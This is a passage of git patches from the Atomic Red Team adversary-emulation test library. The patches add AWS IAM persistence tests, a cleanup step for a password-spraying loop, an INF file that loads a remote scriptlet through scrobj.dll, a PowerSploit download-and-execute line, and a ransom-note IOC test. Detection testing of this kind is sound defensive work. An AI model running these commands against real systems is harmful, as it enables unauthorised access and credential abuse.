TEST](https://atomicredteam.io/contributing) | -| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 50f26155..39a35232 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -36754,6 +36754,39 @@ persistence: ' name: powershell + - name: AWS - Create a group and add a user to that group + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 + description: 'Adversaries create AWS group, add users to specific to that group + to elevate their privilieges to gain more accesss + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Name of the AWS group to create + type: String + default: atomicredteam + dependencies: + - description: 'Check if the user exists, we can only add a user to a group + if the user exists. + +' + prereq_command: 'aws iam list-users | grep #{username} + +' + get_prereq_command: 'echo Please run atomic test T1136.003, before running + this atomic test + +' + executor: + command: | + aws iam create-group --group-name #{username} + aws iam add-user-to-group --user-name #{username} --group-name #{username} + cleanup_command: | + aws iam remove-user-from-group --user-name #{username} --group-name #{username} + aws iam delete-group --group-name #{username} + name: sh T1547.014: technique: external_references: @@ -37007,7 +37040,42 @@ persistence: x_mitre_platforms: - IaaS - Azure AD - atomic_tests: [] + identifier: T1098.001 + atomic_tests: + - name: AWS - Create Access Key and Secret Key + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 + description: 'Adversaries create their own new access and secret keys to programatically + interact with AWS environment, which is already compromised + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Create new AWS access and secret keys for the user + type: String + default: atomicredteam + dependencies: + - description: 'Check if the user exists. + +' + prereq_command: 'aws iam list-users | grep #{username} + +' + get_prereq_command: 'echo Please run atomic test T1136.003, before running + this atomic + +' + executor: + command: | + aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + cd $PathToAtomicsFolder/T1098.001/bin/ + ./aws_secret.sh + cleanup_command: | + access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` + aws iam delete-access-key --access-key-id $access_key --user-name #{username} + rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + name: sh T1546.009: technique: external_references: @@ -38578,7 +38646,43 @@ persistence: - Office 365 - IaaS - Google Workspace - atomic_tests: [] + identifier: T1136.003 + atomic_tests: + - name: AWS - Create a new IAM user + auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad + description: 'Creates a new IAM user in AWS. Upon successful creation, a new + user will be created. Adversaries create new IAM users so that their malicious + activity do not interupt the normal functions of the compromised users and + can remain undetected for a long time + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Username of the IAM user to create in AWS + type: String + default: atomicredteam + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + +' + prereq_command: 'cat ~/.aws/credentials | grep "default" + +' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + +' + executor: + command: 'aws iam create-user --user-name #{username} + +' + cleanup_command: 'aws iam delete-user --user-name #{username} + +' + name: sh + elevation_required: false T1078.004: technique: id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md new file mode 100644 index 00000000..c7e59069 --- /dev/null +++ b/atomics/T1098.001/T1098.001.md @@ -0,0 +1,66 @@ +# T1098.001 - Additional Cloud Credentials +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001) +
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. + +Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) + +In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
+ +## Atomic Tests + +- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key) + + +
+ +## Atomic Test #1 - AWS - Create Access Key and Secret Key +Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-491160a31122 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Create new AWS access and secret keys for the user | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds +cd $PathToAtomicsFolder/T1098.001/bin/ +./aws_secret.sh +``` + +#### Cleanup Commands: +```sh +access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` +aws iam delete-access-key --access-key-id $access_key --user-name #{username} +rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if the user exists. +##### Check Prereq Commands: +```sh +aws iam list-users | grep #{username} +``` +##### Get Prereq Commands: +```sh +echo Please run atomic test T1136.003, before running this atomic +``` + + + + +
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index ff4d250c..d6643fc3 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -8,6 +8,8 @@ - [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate) +- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group) +
@@ -143,4 +145,55 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { +
+
+ +## Atomic Test #3 - AWS - Create a group and add a user to that group +Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Name of the AWS group to create | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-group --group-name #{username} +aws iam add-user-to-group --user-name #{username} --group-name #{username} +``` + +#### Cleanup Commands: +```sh +aws iam remove-user-from-group --user-name #{username} --group-name #{username} +aws iam delete-group --group-name #{username} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if the user exists, we can only add a user to a group if the user exists. +##### Check Prereq Commands: +```sh +aws iam list-users | grep #{username} +``` +##### Get Prereq Commands: +```sh +echo Please run atomic test T1136.003, before running this atomic test +``` + + + +
diff --git a/atomics/T1136.003/T1136.003.md b/atomics/T1136.003/T1136.003.md new file mode 100644 index 00000000..e95db1fc --- /dev/null +++ b/atomics/T1136.003/T1136.003.md @@ -0,0 +1,60 @@ +# T1136.003 - Cloud Account +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/003) +
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) + +Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
+ +## Atomic Tests + +- [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user) + + +
+ +## Atomic Test #1 - AWS - Create a new IAM user +Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8d1c2368-b503-40c9-9057-8e42f21c58ad + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the IAM user to create in AWS | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-user --user-name #{username} +``` + +#### Cleanup Commands: +```sh +aws iam delete-user --user-name #{username} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + + +
From 248d2ed9ccbf45a4bbed5ae8143f2581f5779cc1 Mon Sep 17 00:00:00 2001 From: mhaag-spl <5632822+MHaggis@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:01:42 -0600 Subject: [PATCH 72/84] Update T1110.001.yaml Resolving #1423 --- atomics/T1110.001/T1110.001.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 9cec219a..3cd7f88a 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -32,6 +32,9 @@ atomic_tests: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL + cleanup_command: |- + del #{input_file_users} + del #{input_file_passwords} - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 description: | From 9da2cce7347dc953d1d8902881ad85652978f317 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 21:05:35 +0000 Subject: [PATCH 73/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 3 +++ atomics/T1110.001/T1110.001.md | 5 +++++ 2 files changed, 8 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 39a35232..c67428eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4369,6 +4369,9 @@ credential-access: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL + cleanup_command: |- + del #{input_file_users} + del #{input_file_passwords} - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 03513e36..1a6ad4fa 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -64,6 +64,11 @@ echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL ``` +#### Cleanup Commands: +```cmd +del #{input_file_users} +del #{input_file_passwords} +``` From d6e0adbfff461555d1f2a214e691610949c85378 Mon Sep 17 00:00:00 2001 From: mhaag-spl <5632822+MHaggis@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:36:34 -0600 Subject: [PATCH 74/84] Update Infdefaultinstall.inf Updated and good to go! Resolving #1449 --- atomics/T1218/src/Infdefaultinstall.inf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218/src/Infdefaultinstall.inf b/atomics/T1218/src/Infdefaultinstall.inf index 57d45ecf..49ee5872 100644 --- a/atomics/T1218/src/Infdefaultinstall.inf +++ b/atomics/T1218/src/Infdefaultinstall.inf @@ -5,4 +5,4 @@ Signature=$CHICAGO$ UnregisterDlls = Squiblydoo [Squiblydoo] -11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct +11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct From f85d4a0d65032769773040f56bab89adbcd8c467 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 28 Jun 2021 08:56:57 -0600 Subject: [PATCH 75/84] Update T1135.yaml (#1533) Updated and confirmed operational. #1441 Co-authored-by: Carrie Roberts --- atomics/T1135/T1135.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 7567f6f3..ff02d0ae 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -88,6 +88,14 @@ atomic_tests: Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: | + Endpoint must be joined to domain + prereq_command: | + if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} + get_prereq_command: | + "Join system to domain" executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 From 2b4cf3f6a47f17d78f6ac3f7d35e4103679b4786 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 14:57:33 +0000 Subject: [PATCH 76/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++++++++++ atomics/T1135/T1135.md | 12 ++++++++++++ 2 files changed, 24 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c67428eb..e789dbe4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -51367,6 +51367,18 @@ discovery: ' supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: 'Endpoint must be joined to domain + +' + prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: '"Join system to domain" + +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index a45e078c..3a6992bb 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -217,6 +217,18 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +#### Dependencies: Run with `powershell`! +##### Description: Endpoint must be joined to domain +##### Check Prereq Commands: +```powershell +if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +"Join system to domain" +``` + +
From 691982bbdbe5e1f3285aa13043ac040fbaee0517 Mon Sep 17 00:00:00 2001 From: lexiechong <58893774+lexiechong@users.noreply.github.com> Date: Mon, 28 Jun 2021 10:46:45 -0500 Subject: [PATCH 77/84] T1486-update (#1536) Co-authored-by: Chong Co-authored-by: Carrie Roberts --- atomics/T1486/T1486.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 44f8222c..ecde61fb 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -162,3 +162,19 @@ atomic_tests: cleanup_command: | $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path} rm #{encrypted_file_path} + +- name: PureLocker Ransom Note + description: | + building the IOC (YOUR_FILES.txt) for the PureLocker ransomware + https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ + + supported_platforms: + - windows + + executor: + name: command_prompt + elevation_required: true + command: | + echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt + cleanup_command: | + del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 From 03c05404ae8855abdb39f3a39d139e4e0aea673c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 28 Jun 2021 15:47:07 +0000 Subject: [PATCH 78/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1486/T1486.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index ecde61fb..3e2b9d04 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -164,6 +164,7 @@ atomic_tests: rm #{encrypted_file_path} - name: PureLocker Ransom Note + auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528 description: | building the IOC (YOUR_FILES.txt) for the PureLocker ransomware https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 0c7557d9..b94da380 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -725,3 +725,4 @@ b4988cad-6ed2-434d-ace5-ea2670782129 8822c3b0-d9f9-4daf-a043-491160a31122 8822c3b0-d9f9-4daf-a043-49f110a31122 8d1c2368-b503-40c9-9057-8e42f21c58ad +649349c7-9abf-493b-a7a2-b1aa4d141528 From 4375c6ca56eaac08df3c2d8646b29f27674a372e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 15:47:13 +0000 Subject: [PATCH 79/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 15 ++++++++ atomics/T1486/T1486.md | 35 +++++++++++++++++++ 8 files changed, 57 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 4ee7afcc..0d988691 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score"